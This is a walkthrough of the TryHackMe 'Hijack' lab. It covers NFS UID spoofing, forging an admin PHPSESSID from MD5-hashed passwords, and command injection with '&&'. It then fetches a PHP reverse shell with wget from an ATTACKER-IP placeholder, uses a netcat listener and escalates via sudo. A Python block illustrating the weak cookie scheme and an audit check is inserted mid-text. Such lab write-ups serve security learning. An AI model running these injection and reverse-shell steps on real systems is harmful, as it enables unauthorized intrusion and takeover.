TryHackMe - Hijack Writeup

"Misconfigs conquered, identities claimed."

Link to Try Hack Me room

This may be listed as an easy machine, but it's not that easy.

You will need:-

  • To think out of the box
  • Patience
  • Familiarity with Burp Suite or OWASP ZAP
  • Web application testing skills

Nmap

Initial Nmap scanning shows us 4 open ports:-

  • 21 - FTP
  • 22 - SSH
  • 80 - HTTP
  • 111 - NFS

Getting the user flag

Starting off, the webpage has:-

  • A login page
  • A sign up page
  • An administration page which can only be accessed by the admin
  • A home page

There is nothing interesting here, except that the login page is improperly configured, through which we find out that the user "admin" exists.

This will come in handy later on.

Brute forcing the login page is a rabbit hole as it implements rate limiting which will lock out an account after 5 incorrect login attempts.

Moving on to NFS, we can find the name of the NFS share by running:-

showmount -e <TARGET-IP>

Prior to mounting, we need to edit the fstab file to specify the mount point and IP.

And then we can create the directory, and mount the share to it.

As you can see, we can't access the directory, but a user with the UID "1003" will be able to.

So it's time to create another user.

And we can modify the UID from /etc/passwd.

After switching to the user we created, we find a file called for_employees.txt, which contains FTP credentials.

Now we can access the machine via FTP and get 2 files located there:-

  • .from_admin.txt
  • .passwords_list.txt

The .from_admin.txt file reveals a username "rick", and confirms to us that the user "admin" does in fact use one of the passwords in the .passwords_list.txt file.

Before you get excited and attempt to brute force the login page again, just remember that it implements rate limiting.

After messing around with the website, I decided to create an account and log in, after which I discovered a PHPSESSID in the browser storage.

Plugging this into CyberChef, we discover that it is in the format of "user:password", and it has been URL encoded and formatted as Base64.

But what about the password?

Using hash-identifier, we discover that it is an MD5 hash.
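The cookie format described above, shown beside a hardened alternative. This is an added example, not code from the room or from the original writeup; the function names, the in-memory session store and the sample user and password are assumptions constructed for illustration. The audit function is the check a reviewer would run on a session cookie to see whether it is derived from credentials instead of being random.

```python
import base64
import hashlib
import re
import secrets
from urllib.parse import quote, unquote

# Constructed sample values for illustration; not taken from the room.
SAMPLE_USER = "alice"
SAMPLE_PASSWORD = "correct horse"

# Decoded shape the writeup observed: a username, a colon, then an MD5 hex digest.
CRED_TOKEN = re.compile(r"^(?P<user>[^:]+):(?P<digest>[0-9a-f]{32})$")


def weak_session_id(user: str, password: str) -> str:
    """Scheme described in the writeup: URL-encoded Base64 of user:md5(password)."""
    digest = hashlib.md5(password.encode()).hexdigest()
    raw = f"{user}:{digest}".encode()
    return quote(base64.b64encode(raw).decode(), safe="")


def strong_session_id(store: dict, user: str) -> str:
    """Opaque random ID; the user binding lives only in the server-side store."""
    sid = secrets.token_urlsafe(32)
    store[sid] = user
    return sid


def audit_session_id(cookie_value: str) -> dict:
    """Report whether a session cookie decodes to 'user:<32 hex chars>'."""
    try:
        decoded = base64.b64decode(unquote(cookie_value), validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        # Not valid Base64 text, so it carries no readable credential structure.
        return {"credential_derived": False, "user": None}
    match = CRED_TOKEN.match(decoded)
    if not match:
        return {"credential_derived": False, "user": None}
    return {"credential_derived": True, "user": match["user"]}


if __name__ == "__main__":
    sessions = {}
    for sid in (weak_session_id(SAMPLE_USER, SAMPLE_PASSWORD),
                strong_session_id(sessions, SAMPLE_USER)):
        print(sid, audit_session_id(sid))
```

The weak ID is the same on every login and depends only on the username and password, so server-side rate limiting on the login form does not protect it; the random ID carries no information and is only valid while it exists in the store.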

So, now we have a detailed idea of how we can exploit this.. session hijacking!

I created a short bash script to transform the passwords in the .passwords_list.txt file by:-

  • Hashing each password to MD5
  • Then prepending "admin:" to each password

Of course, we won't be able to manually test each PHPSESSID we have generated, and we also need to encode each PHPSESSID, and this is where Burp Suite comes in handy.

First, let's capture a request to access the /administration.php page.

Then, we load the PHPSESSIDs we generated with the bash script as a payload.

And finally, we add some pre-processors to encode each PHPSESSID.

After a while, we can see that one of the requests returns a different length in the response, and taking a look at the response we see that it worked!

So, we can take that PHPSESSID and replace it in our browser.

Now we get access to the administration panel, through which we can check the status of services running on the machine.

After tinkering with the input for a while, I discovered that we can inject commands by prepending "&&" to our input.

For example:-

&& ls

You can see where this is going..

On my machine, I set up a PHP reverse shell from pentestmonkey.

Next, I started a Python HTTP server:-

python3 -m http.server

And used this command to get the reverse shell onto the target machine:-

wget http://ATTACKER-IP:PORT/php-reverse-shell.php

Sanity check to ensure the reverse shell was uploaded:

Next, all we have to do is set up a netcat listener:-

nc -lvnp <PORT>

And visit http://TARGET-IP/php-reverse-shell.php

Before moving on, we need to upgrade our shell to an interactive TTY; you can follow this guide.

After checking out the /var/www/html directory, we find the password for the user "rick" in config.php

And after switching to rick, we get the user flag in /home/rick/user.txt.

Getting the root flag

Now the hard part is over.. trust me.

Time for privilege escalation.

We check what rick can run with sudo:

And after a bit of research, we find this article from HackTricks.

So, all we have to do to become root is:-

  • Create the C script on our machine
  • Use a Python HTTP server and wget to transfer it to the target machine
  • Compile the C file
  • And finally, execute it with the command we get from sudo -l

And that's it! The root flag is at /root/root.txt
